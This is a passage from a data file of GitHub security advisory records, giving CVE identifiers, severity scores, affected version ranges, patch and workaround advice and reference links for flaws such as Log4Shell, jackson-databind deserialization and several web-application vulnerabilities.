'2021-12-10T00:15:00Z'}" +1.4.0,GHSA-3w6p-8f82-gw8r,2021-12-17T20:34:04Z,2021-12-17T20:42:38Z,,[],Using JMSAppender in log4j configuration may lead to deserialization of untrusted data,"### Impact + +ClickHouse JDBC Bridge uses [slf4j-log4j12 1.7.32](https://repo1.maven.org/maven2/org/slf4j/slf4j-log4j12/1.7.32/), which depends on [log4j 1.2.17](https://repo1.maven.org/maven2/log4j/log4j/1.2.17/). It allows a remote attacker to execute code on the server, if you changed default log4j configuration by adding JMSAppender and an insecure JMS broker. + +### Patches + +The patch version `2.0.7` removed log4j dependency by replacing `slf4j-log4j12` to `slf4j-jdk14`. Logging configuration is also changed from `log4j.properties` to `logging.properties`. + +### Workarounds + +1. Do NOT change log4j configuration to use JMSAppender along with insecure JMS broker +2. Alternatively, you can issue below command to remove `JMSAppender.class`: + +```(bash) +# install zip command if you don't have +apt-get update && apt-get install -y zip +# remove the class +zip -d clickhouse-jdbc-bridge*.jar ru/yandex/clickhouse/jdbcbridge/internal/log4j/net/JMSAppender.class +``` + +### References + +Please refer to [CVE-2021-4104](https://access.redhat.com/security/cve/CVE-2021-4104) to read more. + +### For more information + +If you have any questions or comments about this advisory, please feel free to open an issue in the repository. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'ru.yandex.clickhouse:clickhouse-jdbc-bridge'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.7'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ClickHouse/clickhouse-jdbc-bridge/security/advisories/GHSA-3w6p-8f82-gw8r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-4104'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/CVE-2021-4104'}, {'type': 'PACKAGE', 'url': 'https://github.com/ClickHouse/clickhouse-jdbc-bridge'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-12-17T20:34:04Z', 'nvd_published_at': None}" +1.4.0,GHSA-5r5r-6hpj-8gg9,2022-02-08T21:39:40Z,2021-12-09T19:15:24Z,,['CVE-2020-35728'],Serialization gadget exploit in jackson-databind,"FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool (aka embedded Xalan in org.glassfish.web/javax.servlet.jsp.jstl).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson:jackson-databind'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.9.10.8'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.9.10.7'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35728'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/issues/2999'}, {'type': 'PACKAGE', 'url': 'https://github.com/FasterXML/jackson-databind'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html'}, {'type': 'WEB', 'url': 'https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210129-0007/'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-07T22:24:20Z', 'nvd_published_at': '2020-12-27T05:15:00Z'}" +1.4.0,GHSA-vm5j-vqr6-v7v8,2021-05-25T20:40:19Z,2021-12-10T20:04:56Z,,['CVE-2020-7640'],OS Command Injection in pixl-class,pixl-class prior to 1.0.3 allows execution of arbitrary commands. The members argument of the create function can be controlled by users without any sanitization.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'pixl-class'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7640'}, {'type': 'WEB', 'url': 'https://github.com/jhuckaby/pixl-class/commit/47677a3638e3583e42f3a05cc7f0b30293d2acc8'}, {'type': 'WEB', 'url': 'https://github.com/jhuckaby/pixl-class/commit/47677a3638e3583e42f3a05cc7f0b30293d2acc8,'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-PIXLCLASS-564968'}]","{'cwe_ids': ['CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-25T20:40:19Z', 'nvd_published_at': '2020-04-27T22:15:00Z'}" +1.4.0,GHSA-m4h3-7mc2-v295,2022-01-04T19:00:33Z,2021-12-17T20:41:21Z,,['CVE-2020-35214'],An issue in Atomix v3.1.5 allows a malicious Atomix node to remove states of ONOS storage via abuse of primitive operations.,An issue in Atomix v3.1.5 allows a malicious Atomix node to remove states of ONOS storage via abuse of primitive operations.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.atomix:atomix'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.1.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35214'}, {'type': 'WEB', 'url': 'https://docs.google.com/presentation/d/1wJi4QJko5ZCdADuzmAG9ed-nQLyJVkLBJf6cylAL71A/edit?usp=sharing'}, {'type': 'PACKAGE', 'url': 'https://github.com/atomix/atomix'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-12-17T19:11:26Z', 'nvd_published_at': '2021-12-16T20:15:00Z'}" +1.4.0,GHSA-5fh3-25xr-g85h,2021-12-03T15:19:38Z,2021-12-03T20:40:50Z,,['CVE-2021-4018'],snipe-it is vulnerable to Cross-site Scripting,snipe-it is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting').,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'snipe/snipe-it'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.3.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-4018'}, {'type': 'WEB', 'url': 'https://github.com/snipe/snipe-it/commit/ff81e6d5366c2cfb15618793ad919ae4cbb3ac57'}, {'type': 'PACKAGE', 'url': 'https://github.com/snipe/snipe-it/'}, {'type': 'WEB', 'url': 'https://github.com/snipe/snipe-it/releases/tag/v5.3.3'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/c14395f6-bf0d-4b06-b4d1-b509d8a99b54'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-02T21:24:35Z', 'nvd_published_at': '2021-12-01T10:15:00Z'}" +1.4.0,GHSA-7prf-vw4p-qr59,2021-06-22T15:45:35Z,2021-12-10T19:03:07Z,,['CVE-2020-24939'],Prototype pollution in supermixer,Prototype pollution in Stampit supermixer allows an attacker to modify the prototype of a base object which can vary in severity depending on the implementation.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'supermixer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-24939'}, {'type': 'WEB', 'url': 'https://github.com/stampit-org/supermixer/issues/9'}, {'type': 'WEB', 'url': 'https://github.com/stampit-org/supermixer/commit/94dcc6fc45e0fed96187cb52aaffadf76dbbc0a3'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/959987'}, {'type': 'WEB', 'url': 'https://github.com/stampit-org/supermixer/compare/v1.0.4...v1.0.5'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-17T18:46:22Z', 'nvd_published_at': '2021-06-16T16:15:00Z'}" +1.4.0,GHSA-cvm9-fjm9-3572,2023-09-14T16:06:24Z,2021-12-09T19:16:10Z,,['CVE-2020-36181'],Unsafe Deserialization in jackson-databind,"FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS`.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.9.10.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.6.7.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36181'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/issues/3004'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/commit/3ded28aece694d0df39c9f0fa1ff385b14a8656b'}, {'type': 'WEB', 'url': 'https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062'}, {'type': 'PACKAGE', 'url': 'https://github.com/FasterXML/jackson-databind'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210205-0005/'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T23:37:23Z', 'nvd_published_at': '2021-01-06T23:15:00Z'}" +1.4.0,GHSA-cxg7-84wp-8pcq,2022-08-11T18:47:07Z,2021-12-16T21:01:07Z,,['CVE-2021-4117'],YetiForceCRM is vulnerable to Business Logic Errors in the weight of a product,YetiForceCRM is vulnerable to Business Logic Errors in the Weight of a Product since that value can be a negative number.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'yetiforce/yetiforce-crm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '6.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-4117'}, {'type': 'WEB', 'url': 'https://github.com/yetiforcecompany/yetiforcecrm/commit/8dccd93442725f245b4b71986bbe6f4f48639239'}, {'type': 'PACKAGE', 'url': 'https://github.com/yetiforcecompany/yetiforcecrm'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/0b81e572-bdc9-4caf-aa02-81f3c7ad7c0a'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-16T15:39:07Z', 'nvd_published_at': '2021-12-15T15:15:00Z'}" +1.4.0,GHSA-6gww-qpm6-mc2g,2021-11-29T15:08:38Z,2021-12-02T17:51:51Z,,['CVE-2021-23718'],Server-Side Request Forgery in ssrf-agent,The package ssrf-agent before 1.0.5 are vulnerable to Server-side Request Forgery (SSRF) via the defaultIpChecker function. It fails to properly validate if the IP requested is private.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'ssrf-agent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23718'}, {'type': 'WEB', 'url': 'https://github.com/welefen/ssrf-agent/commit/9607175acd0647d821bae4e8fcc3b712aca3fd2d#diff-e727e4bdf3657fd1d798edcd6b099d6e092f8573cba266154583a746bba0f346'}, {'type': 'PACKAGE', 'url': 'https://github.com/welefen/ssrf-agent'}, {'type': 'WEB', 'url': 'https://github.com/welefen/ssrf-agent/blob/cec2b85fe8886ad6926a247a3e059d8369ec022b/index.js%23L13'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20211203-0005/'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-SSRFAGENT-1584362'}]","{'cwe_ids': ['CWE-918'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-23T19:15:40Z', 'nvd_published_at': '2021-11-22T17:15:00Z'}" +1.4.0,GHSA-hjhp-hwfj-hwf3,2021-12-06T21:43:09Z,2021-12-10T20:20:08Z,,['CVE-2021-4005'],Cross Site Request Forgery in firefly-iii ,firefly-iii is vulnerable to a Cross-Site Request Forgery (CSRF) attack which can disable two factor authentication for the target user.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'grumpydictator/firefly-iii'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.6.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-4005'}, {'type': 'WEB', 'url': 'https://github.com/firefly-iii/firefly-iii/commit/03a1601bf343181df9f405dd2109aec483cb7053'}, {'type': 'PACKAGE', 'url': 'https://github.com/firefly-iii/firefly-iii'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/bf4ef581-325a-492d-a710-14fcb53f00ff'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-06T21:43:09Z', 'nvd_published_at': '2021-12-04T12:15:00Z'}" +1.4.0,GHSA-c6c4-jmqx-3r33,2021-05-25T16:23:58Z,2021-12-09T19:30:14Z,,['CVE-2020-11611'],Open Redirect in xdLocalStorage,An issue was discovered in xdLocalStorage through 2.0.5. The buildMessage() function in xdLocalStorage.js specifies the wildcard (*) as the targetOrigin when calling the postMessage() function on the iframe object. Therefore any domain that is currently loaded within the iframe can receive the messages that the client sends.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'xdlocalstorage'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.0.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11611'}, {'type': 'WEB', 'url': 'https://github.com/ofirdagan/cross-domain-local-storage'}, {'type': 'WEB', 'url': 'https://grimhacker.com/exploiting-xdlocalstorage-localstorage-and-postmessage/#Missing-TargetOrigin-Client'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-25T16:23:58Z', 'nvd_published_at': '2020-04-07T18:15:00Z'}" +1.4.0,GHSA-4f6x-49g2-99fm,2021-07-02T16:59:18Z,2021-12-10T18:57:41Z,,['CVE-2021-35513'],Cross-site Scripting in Mermaid,Mermaid before 8.11.0 allows XSS when the antiscript feature is used.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'mermaid'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.11.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-35513'}, {'type': 'WEB', 'url': 'https://github.com/mermaid-js/mermaid/issues/2122'}, {'type': 'WEB', 'url': 'https://github.com/mermaid-js/mermaid/pull/2123'}, {'type': 'WEB', 'url': 'https://github.com/mermaid-js/mermaid/pull/2123/commits/3d22fa5d2435de5acc18de6f88474a6e8675a60e'}, {'type': 'WEB', 'url': 'https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-28T18:34:26Z', 'nvd_published_at': '2021-06-27T12:15:00Z'}" +1.4.0,GHSA-w6v2-qchm-grj7,2021-05-24T17:12:01Z,2021-12-20T18:25:46Z,,['CVE-2020-25039'],Insecure permissions on user namespace / fakeroot temporary rootfs in Singularity,"### Impact + +Insecure permissions on temporary directories used in fakeroot or user namespace container execution. + +When a Singularity action command (run, shell, exec) is run with the fakeroot or user namespace option, Singularity will extract a container image to a temporary sandbox directory. Due to insecure permissions on the temporary directory it is possible for any user with access to the system to read the contents of the image. Additionally, if the image contains a world-writable file or directory, it is possible for a user to inject arbitrary content into the running container. + +### Patches + +This issue is addressed in Singularity 3.6.3. + +All users are advised to upgrade to 3.6.3. + +### Workarounds + +The issue is mitigated if `TMPDIR` is set to a location that is only accessible to the user, as any subdirectories directly under `TMPDIR` cannot then be accessed by others. However, this is difficult to enforce so it is not recommended to rely on this as a mitigation. + +### For more information + +General questions about the impact of the advisory / changes made in the 3.6.0 release can be asked in the: + +* [Singularity Slack Channel](https://bit.ly/2m0g3lX) +* [Singularity Mailing List](https://groups.google.com/a/lbl.gov/forum/??sdf%7Csort:date#!forum/singularity) + +Any sensitive security concerns should be directed to: security@sylabs.io + +See our Security Policy here: https://sylabs.io/security-policy","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/sylabs/singularity'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.2.0'}, {'fixed': '3.6.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/hpcng/singularity/security/advisories/GHSA-w6v2-qchm-grj7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-25039'}, {'type': 'WEB', 'url': 'https://medium.com/sylabs'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00070.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00088.html'}]","{'cwe_ids': ['CWE-668', 'CWE-732'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-24T17:12:01Z', 'nvd_published_at': '2020-09-16T18:15:00Z'}" +1.4.0,GHSA-h86j-6h6m-qjqw,2021-12-09T17:55:01Z,2021-12-10T20:26:34Z,,['CVE-2021-4049'],Cross-Site Request Forgery in remdex/livehelperchat,"An attacker is able to log out a user if a logged-in user visits the attacker's website. While this cannot harm a user's account, it can be a great annoyance and is a valid CSRF.",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'remdex/livehelperchat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-4049'}, {'type': 'WEB', 'url': 'https://github.com/livehelperchat/livehelperchat/commit/e7fe1aa6a087d4d21b2e8a0dadd2e08f42acbb57'}, {'type': 'PACKAGE', 'url': 'https://github.com/livehelperchat/livehelperchat'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/62408fa4-2c16-4fcd-8b34-41fcdccb779e'}]","{'cwe_ids': ['CWE-352'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-12-08T20:27:25Z', 'nvd_published_at': '2021-12-07T11:15:00Z'}" +1.4.0,GHSA-jfh8-c2jp-5v3q,2022-03-25T20:56:18Z,2021-12-10T00:40:56Z,,['CVE-2021-44228'],Remote code injection in Log4j,"# Summary + +Log4j versions prior to 2.16.0 are subject to a remote code execution vulnerability via the ldap JNDI parser. +As per [Apache's Log4j security guide](https://logging.apache.org/log4j/2.x/security.html): Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.16.0, this behavior has been disabled by default. + +Log4j version 2.15.0 contained an earlier fix for the vulnerability, but that patch did not disable attacker-controlled JNDI lookups in all situations. For more information, see the `Updated advice for version 2.16.0` section of this advisory. + +# Impact + +Logging untrusted or user controlled data with a vulnerable version of Log4J may result in Remote Code Execution (RCE) against your application. This includes untrusted data included in logged errors such as exception traces, authentication failures, and other unexpected vectors of user controlled input. + +# Affected versions + +Any Log4J version prior to v2.15.0 is affected to this specific issue. + +The v1 branch of Log4J which is considered End Of Life (EOL) is vulnerable to other RCE vectors so the recommendation is to still update to 2.16.0 where possible. + +## Security releases +Additional backports of this fix have been made available in versions 2.3.1, 2.12.2, and 2.12.3 + +## Affected packages +Only the `org.apache.logging.log4j:log4j-core` package is directly affected by this vulnerability. The `org.apache.logging.log4j:log4j-api` should be kept at the same version as the `org.apache.logging.log4j:log4j-core` package to ensure compatability if in use. + +# Remediation Advice + +## Updated advice for version 2.16.0 + +The Apache Logging Services team provided updated mitigation advice upon the release of version 2.16.0, which [disables JNDI by default and completely removes support for message lookups](https://logging.apache.org/log4j/2.x/changes-report.html#a2.16.0). +Even in version 2.15.0, lookups used in layouts to provide specific pieces of context information will still recursively resolve, possibly triggering JNDI lookups. This problem is being tracked as [CVE-2021-45046](https://nvd.nist.gov/vuln/detail/CVE-2021-45046). More information is available on the [GitHub Security Advisory for CVE-2021-45046](https://github.com/advisories/GHSA-7rjr-3q55-vv33). + +Users who want to avoid attacker-controlled JNDI lookups but cannot upgrade to 2.16.0 must [ensure that no such lookups resolve to attacker-provided data and ensure that the the JndiLookup class is not loaded](https://issues.apache.org/jira/browse/LOG4J2-3221). + +Please note that Log4J v1 is End Of Life (EOL) and will not receive patches for this issue. Log4J v1 is also vulnerable to other RCE vectors and we recommend you migrate to Log4J 2.16.0 where possible. + +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.logging.log4j:log4j-core'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.13.0'}, {'fixed': '2.15.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.logging.log4j:log4j-core'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.logging.log4j:log4j-core'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4'}, {'fixed': '2.12.2'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.guicedee.services:log4j-core'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.2.1.2-jre17'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xbib.elasticsearch:log4j'}, 'ecosystem_specific': {'affected_functions': ['']}, 'versions': ['6.3.2.1']}, {'package': {'ecosystem': 'Maven', 'name': 'uk.co.nichesolutions.logging.log4j:log4j-core'}, 'ecosystem_specific': {'affected_functions': ['']}, 'versions': ['2.6.3-CUSTOM']}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-44228'}, {'type': 'WEB', 'url': 'https://github.com/apache/logging-log4j2/pull/608'}, {'type': 'WEB', 'url': 'https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf'}, {'type': 'WEB', 'url': 'https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf'}, {'type': 'WEB', 'url': 'https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf'}, {'type': 'WEB', 'url': 'https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-7rjr-3q55-vv33'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/logging-log4j2'}, {'type': 'WEB', 'url': 'https://github.com/cisagov/log4j-affected-db'}, {'type': 'WEB', 'url': 'https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md'}, {'type': 'WEB', 'url': 'https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228'}, {'type': 'WEB', 'url': 'https://github.com/tangxiaofeng7/apache-log4j-poc'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/LOG4J2-3198'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/LOG4J2-3201'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/LOG4J2-3214'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/LOG4J2-3221'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/'}, {'type': 'WEB', 'url': 'https://logging.apache.org/log4j/2.x/changes-report.html#a2.15.0'}, {'type': 'WEB', 'url': 'https://logging.apache.org/log4j/2.x/manual/lookups.html#JndiLookup'}, {'type': 'WEB', 'url': 'https://logging.apache.org/log4j/2.x/manual/migration.html'}, {'type': 'WEB', 'url': 'https://logging.apache.org/log4j/2.x/security.html'}, {'type': 'WEB', 'url': 'https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/'}, {'type': 'WEB', 'url': 'https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20211210-0007/'}, {'type': 'WEB', 'url': 'https://support.apple.com/kb/HT213189'}, {'type': 'WEB', 'url': 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd'}, {'type': 'WEB', 'url': 'https://twitter.com/kurtseifried/status/1469345530182455296'}, {'type': 'WEB', 'url': 'https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5020'}, {'type': 'WEB', 'url': 'https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html'}, {'type': 'WEB', 'url': 'https://www.kb.cert.org/vuls/id/930724'}, {'type': 'WEB', 'url': 'https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/alert-cve-2021-44228.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html'}, {'type': 'WEB', 'url': 